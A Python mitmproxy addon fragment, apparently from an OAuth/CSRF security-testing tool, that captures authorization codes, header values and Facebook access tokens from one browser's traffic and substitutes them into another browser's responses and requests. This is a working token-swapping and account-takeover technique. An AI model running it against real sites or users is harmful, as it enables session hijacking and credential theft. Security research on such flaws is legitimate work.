def csrf_substitude_code_in_location(self, target,
flow: mitmproxy.http.HTTPFlow):
if "location" in flow.response.headers.keys():
location = flow.response.headers["location"]
if target not in location:
return False
self.logger.write_info("csrf on key value in location header")
self.logger.write_info("[location]: " + location)
if self.browserID in flow.request.headers.keys():
key_value = extract_code_from_content(location, target)
self.logger.write_info("[target] " + target + " " + key_value)
self.logger.write_file(self.RAM + target, key_value)
self.logger.write_info("Successfully save key value to " +
self.RAM + target)
flow.kill()
self.logger.write_info("kill flow")
else:
self.logger.write_info(
"[ORIGIN " + target + "] " +
extract_code_from_content(location, target))
with open(self.RAM + target, 'r+') as f:
key_value = f.readlines()[0]
self.logger.write_info("[CHANGE " + target + "] " + key_value)
flow.response.headers["location"] = substitute_code(
location, target, key_value)
self.logger.write_info("If succeed? " + str(
key_value in flow.response.headers["location"]))
return True
return False
def csrf_substitude_code_in_text(self, target,
flow: mitmproxy.http.HTTPFlow):
if target in flow.response.text:
self.logger.write_info("csrf on value in response text")
if self.browserID in flow.request.headers.keys():
key_value = extract_code_from_content(flow.response.text,
target)
self.logger.write_info("[target] " + target + " " + key_value)
self.logger.write_file(self.RAM + target, key_value)
self.logger.write_info("Successfully save key value to " +
self.RAM + target)
flow.kill()
self.logger.write_info("kill flow")
else:
self.logger.write_info(
"[ORIGIN " + target + "] " +
extract_code_from_content(flow.response.text, target))
with open(self.RAM + target, 'r+') as f:
key_value = f.readlines()[0]
self.logger.write_info("[CHANGE " + target + "] " + key_value)
substitute_access_token_in_text(flow, target, key_value)
self.logger.write_info("If succeed? " +
str(key_value in flow.response.text))
return True
return False
def csrf_substitude_header(self, target, flow: mitmproxy.http.HTTPFlow):
if target in flow.response.headers.keys():
self.logger.write_info("csrf change a whole header value")
value = flow.response.headers[target]
if self.browserID in flow.request.headers.keys():
key_value = value
self.logger.write_info("[target] " + target + " " + key_value)
self.logger.write_file(self.RAM + target, key_value)
self.logger.write_info("Successfully save key value to " +
self.RAM + target)
flow.kill()
self.logger.write_info("kill flow")
else:
self.logger.write_info("[ORIGIN " + target + "] " + value)
with open(self.RAM + target, 'r+') as f:
key_value = f.readlines()[0]
self.logger.write_info("[CHANGE " + target + "] " + key_value)
flow.response.headers[target] = key_value
self.logger.write_info("If succeed? " + str(
key_value in flow.response.headers[target]))
def request(flow: mitmproxy.http.HTTPFlow):
"""
The full HTTP request has been read.
"""
global log_file
host = checker.check_host(flow)
if host:
if checker.check_TLS(flow):
logger.write(log_file, \
"[TLS] " + flow.request.pretty_url)
if "test.xxx" in flow.request.host:
flow.kill()
# csrf
global access_token
target = "fb_access_token="
if target in flow.request.pretty_url:
if "longming" in flow.request.headers.keys():
# access_token = csrf.extract_code(flow, target)
access_token = flow.request.pretty_url
logger.write_info(log_file, "[TOKEN] " + access_token)
assert access_token
logger.write_file("RAM/access_token", access_token)
flow.kill()
else:
l = os.listdir('RAM')
while not l:
time.sleep(1)
l = os.listdir('RAM')
logger.write_info(
log_file, "[ORIGIN TOKEN] " + csrf.extract_code(flow, target))
with open('RAM/' + l[0], 'r+') as f:
access_token = f.readlines()[0]
logger.write_info(log_file, "[CHANGE TOKEN] " + access_token)
assert access_token
# assert csrf.csrf_request(flow, target, access_token)
flow.request.url = access_token
